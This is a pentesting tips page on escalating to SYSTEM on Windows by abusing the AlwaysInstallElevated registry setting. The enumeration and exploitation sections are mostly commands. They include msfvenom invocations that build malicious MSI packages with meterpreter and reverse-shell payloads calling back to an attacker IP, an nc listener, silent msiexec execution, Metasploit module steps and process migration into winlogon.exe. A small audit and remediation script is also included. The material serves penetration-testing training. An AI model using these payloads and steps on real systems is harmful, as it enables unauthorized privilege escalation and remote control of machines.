CSbyGB - Pentips
Always Installed Elevated exploitation


Last updated 3 years ago

Target requirements

  • The target needs to have these values in the registry:

    • In Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer, AlwaysInstallElevated set to 1

    • In Computer\HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer, AlwaysInstallElevated set to 1

  • When both are set, installation packages are installed with elevated privileges.

Enumerate with cmd

  • Type reg query HKLM\Software\Policies\Microsoft\Windows\Installer in a cmd prompt; AlwaysInstallElevated should be set to 1

  • Type reg query HKCU\Software\Policies\Microsoft\Windows\Installer; AlwaysInstallElevated should be set to 1 as well
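As an added defender-side example (not code from the original page), the following PowerShell audits both AlwaysInstallElevated values described above, reports whether the setting is effective, and can reset both values to 0; the function names are my own.

```powershell
# Added audit/remediation helper, not part of the original page.
# The setting is only effective when BOTH the HKLM and the HKCU value are 1,
# so the check mirrors the two reg query commands above.
function Get-AlwaysInstallElevatedStatus {
    $paths = [ordered]@{
        HKLM = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
        HKCU = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    }
    $result = [ordered]@{}
    foreach ($hive in $paths.Keys) {
        $value = $null
        if (Test-Path $paths[$hive]) {
            $value = (Get-ItemProperty -Path $paths[$hive] -Name AlwaysInstallElevated `
                        -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        # A missing key or value behaves like 0 (policy not configured)
        $result[$hive] = if ($null -eq $value) { 0 } else { [int]$value }
    }
    $result['Vulnerable'] = ($result['HKLM'] -eq 1 -and $result['HKCU'] -eq 1)
    [pscustomobject]$result
}

# Hardening: explicitly set both values to 0. Writing HKLM requires an
# elevated prompt; in a domain, fix the GPO that pushes the setting as well
# (Administrative Templates > Windows Components > Windows Installer >
# "Always install with elevated privileges"), or it will be re-applied.
function Disable-AlwaysInstallElevated {
    foreach ($path in 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
                      'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer') {
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        New-ItemProperty -Path $path -Name AlwaysInstallElevated -PropertyType DWord `
            -Value 0 -Force | Out-Null
    }
    Get-AlwaysInstallElevatedStatus
}

$status = Get-AlwaysInstallElevatedStatus
$status
if ($status.Vulnerable) {
    Write-Warning 'AlwaysInstallElevated is enabled in both hives: any user can install an MSI with elevated privileges.'
}
```

Run Get-AlwaysInstallElevatedStatus as the user you are auditing (the HKCU value is per user) and Disable-AlwaysInstallElevated from an elevated prompt.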

Exploitation

  • You should already have a shell on the target (Covenant, Metasploit or netcat). We will use Covenant and Metasploit here.

Covenant

Enumerate with SharpUp audit

  • In your shell type SharpUp audit

  • In the results you should see this:

    === AlwaysInstallElevated Registry Keys ===
    
      HKLM:    1
      HKCU:    1

Enumerate with PowerUp

  • In the shell, type PowerShellImport, press Enter and fetch PowerUp.ps1 (if you do not have it, you will need to get it first)

  • Click on Execute

  • Type powershell invoke-allchecks in your shell

  • We should see this:

    [*] Checking for AlwaysInstallElevated registry key...
    AbuseFunction : Write-UserAddMSI

Exploitation

  • Generate a payload with msfvenom: msfvenom -p windows/exec CMD="" -f msi -o exploitalwaysinstalled.msi. Between the quotes, paste an encoded launcher.

  • Upload the file to the target using Covenant's Upload command (type Upload and press Enter, fill in the file path on the target and browse to the file on your attack machine)

  • Run it using shell msiexec /quiet /qn /i exploitalwaysinstalled.msi

  • A new grunt should check in as an elevated user:

    > whoami
    NT AUTHORITY\SYSTEM

Exploitation with PowerUp

  • powershell -ep bypass

  • . .\PowerUp.ps1

  • Write-UserAddMSI

  • It will set up a malicious MSI called UserAdd, with which we will be able to add a user

Metasploit

  • Interact with the session you should already have from the initial foothold: sessions -i num-of-session

Enumerate

  • Launch run post/multi/recon/local_exploit_suggester

  • You should see:

    exploit/windows/local/always_install_elevated: The target is vulnerable.

Exploitation

  • Background your session with Ctrl+Z

  • Type use exploit/windows/local/always_install_elevated

  • set session num-of-session (the number of the session you have on your target)

  • Type exploit -j

  • List the sessions; you should have another one running as NT AUTHORITY\SYSTEM

  • Type ps and look for a process under session 1 so that we can migrate to it

  • We can use winlogon.exe:

    620 520 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe

  • Migrate to it using migrate PID-number; in our example it is going to be migrate 520

OR

  • msfconsole

  • use multi/handler

  • set payload windows/meterpreter/reverse_tcp

  • set lhost your-Kali-IP

  • run

  • In another console tab: msfvenom -p windows/meterpreter/reverse_tcp lhost=Your-Kali-IP -f msi -o setup.msi

  • Get the generated MSI onto your target (for example, a Python HTTP server on the attack machine, then download it from the target's browser)

  • On the target, place setup.msi in a folder where you have write access

  • Open a command prompt and type: msiexec /quiet /qn /i C:\Folder\you\chose\setup.msi

  • You should get an elevated shell in msfconsole

Other way

  • Generate a malicious MSI package: msfvenom -p windows/shell_reverse_tcp lhost=IP-OF-ATTACK-MACHINE lport=PORT -f msi > file.msi

  • Set up a listener: rlwrap nc -lnvp CHOSEN-PORT

  • Upload it to the target and execute it from cmd: msiexec /i c:\users\user\desktop\file.msi /quiet /qn /norestart

  • You should get an elevated shell

Resources

  • Movement, Pivoting and Persistence for Pentesters and Ethical Hackers

  • TCM Security Academy - Movement, Pivoting and Persistence for Pentesters and Ethical Hackers